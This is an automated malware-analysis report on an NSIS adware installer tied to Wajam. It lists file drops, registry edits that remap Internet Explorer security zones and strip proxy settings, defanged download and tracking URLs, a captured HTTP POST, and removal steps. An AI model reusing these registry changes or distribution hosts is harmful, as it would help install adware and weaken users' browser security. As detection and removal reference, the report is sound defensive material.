Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4d8e89edd3f45e2148a4a1fb2ce66c31
SHA1: 31ff7b5f6bc76a977526878c0d6c338af43ed6a0
SHA256: 76cc2a526ae7536e119d80cba79db6f0fce08ab08f967dc061a139ea0640189f
SSDeep: 12288:5rBp5UkallMCBw8yIBtp8dbJd5A4AzybJd5A81:59UkalWCTQdbJd5A4AzybJd5A81
Size: 509176 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
wajam_validate.exe:1672
The Trojan injects its code into the following process(es):
%original file name%.exe:1812
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\close-btn.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer5.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\CompleteScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (136383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer1.zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseBA.tmp (172080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (164814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_243_FP_spws243[1].zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfferScreen_235_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\start-bullet.jpg (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\installog.txt (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB5.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB9.tmp (152335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_v4[1].htm (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\download.jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\branding.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\InstallScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\WelcomeScreen.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer4.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\WS_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer2.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\but1.png (5574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferAssets.zip (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BI_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer3.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\OfferScreen_291_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreen_38_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\skip.jpg (2490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBD.tmp (151604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DSS_IMapplication_mon_NV1_2[1].htm (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\LoadingBar.gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html (3745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\click.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\trusted1.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_145_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB8.tmp (150063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html (5521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DS_wrapper_details_v2[1].htm (476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.html (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmBC.tmp (148882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB7.tmp (137924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\unchecked.jpg (444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\output.txt (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\checked.jpg (503 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OK (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\success (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html.old (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html.old (0 bytes)
Registry activity
The process wajam_validate.exe:1672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 81 1D 53 43 49 D4 4A 9C A9 20 63 8F 46 64 89"
The process %original file name%.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080420140805\"
"CachePrefix" = ":2014080420140805:"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheLimit" = "8192"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080420140805]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1260053532"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 11 D5 BB 39 B9 CE 75 76 C4 7F F0 BA B8 D9 9B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any other zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013030120130302]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021120130218]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021820130225]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
b9380b0bea8854fd9f93cc1fda0dfeac | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll |
5264f7d6d89d1dc04955cfb391798446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\GetVersion.dll |
b140459077c7c39be4bef249c2f84535 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\Math.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\System.dll |
7579ade7ae1747a31960a228ce02e666 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\UserInfo.dll |
5afd4a9b7e69e7c6e312b2ce4040394a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\blowfish.dll |
134b93f8bd1f82cd2f1b06c878580703 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\inetc.dll |
94ba775c8a1f4d6c9bb1966eddce22b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\manlib.dll |
c10e04dd4ad4277d5adc951bb331c777 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll |
a056772e31415e022147d5c4ffcfe22a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll |
5f13dbc378792f23e598079fc1e4422b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\nsisunz.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\registry.dll |
46f5c497f96e733176b010ff0ee56de3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe |
46f5c497f96e733176b010ff0ee56de3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wajam_validate.exe:1672
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\close-btn.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer5.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\CompleteScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (136383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer1.zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseBA.tmp (172080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (164814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_243_FP_spws243[1].zip (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\OfferScreen_235_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\start-bullet.jpg (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wajam_validate[1].exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\installog.txt (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB5.tmp (116869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB9.tmp (152335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\ExecCmd.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\wajam_validate.exe (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\FCL_Co_v4[1].htm (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\download.jpg (6025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\branding.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\InstallScreen.html (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\WelcomeScreen.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer4.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\WS_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer2.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\but1.png (5574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferAssets.zip (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_243.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\BI_Flash___Click_To_Safe_Install___________________________MA_02_9342[1].jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Offer3.zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_38.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\OfferScreen_291_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\OfferScreen_38_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\skip.jpg (2490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBD.tmp (151604 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_145.html (5041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DSS_IMapplication_mon_NV1_2[1].htm (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\LoadingBar.gif (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_291.html (3745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\click.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\trusted1.jpg (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsJSWV6.dll (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\OfferScreen_145_EN[1].zip (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB8.tmp (150063 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\OfferScreen_235.html (5521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\DS_wrapper_details_v2[1].htm (476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\loading.html (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmBC.tmp (148882 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB7.tmp (137924 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\unchecked.jpg (444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\output.txt (927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB3.tmp\checked.jpg (503 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46304 | c52a72deb0170941d392ec38c6aeafd0 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 298072 | 1024 | 3.32453 | 723ad80df002dc5421798f4307abe5cf |
.ndata | 335872 | 1908736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2244608 | 102848 | 102912 | 3.69799 | 0f65a45d68577e96223f6c630a739884 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://fglasspeast.com/FCL_Co_v4.php | |
hxxp://stsunsetwest.com/DS_wrapper_details_v2.php | |
hxxp://www.wajam.com/download/wajam_validate.exe | |
hxxp://www.wajam.com/install/valid?v=1&unique_id=0630F6DB1811B361E367028BD09FCCEB | |
hxxp://secure.goeastcdncache.com.cdngc.net/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip | |
hxxp://secure.goeastcdncache.com.cdngc.net/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg | |
hxxp://stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php | |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/OfferScreen_243_FP_spws243.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_291_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_38_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_235_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us.cdngc.net/os/js/OfferScreen_145_EN.zip | 174.35.73.156 |
hxxp://stsunsetwest.com/DS_trackstats_mon_v2.php | |
hxxp://www.stsunsetwest.com/DS_trackstats_mon_v2.php | 50.19.102.217 |
hxxp://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip | |
hxxp://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip | 174.35.73.156 |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip | 174.35.73.156 |
hxxp://www.fglasspeast.com/FCL_Co_v4.php | |
hxxp://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip | 174.35.73.156 |
hxxp://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg | |
hxxp://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php | 50.19.102.217 |
hxxp://www.stsunsetwest.com/DS_wrapper_details_v2.php | 50.19.102.217 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /DS_trackstats_mon_v2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 158
Connection: Keep-Alive
Cache-Control: no-cache
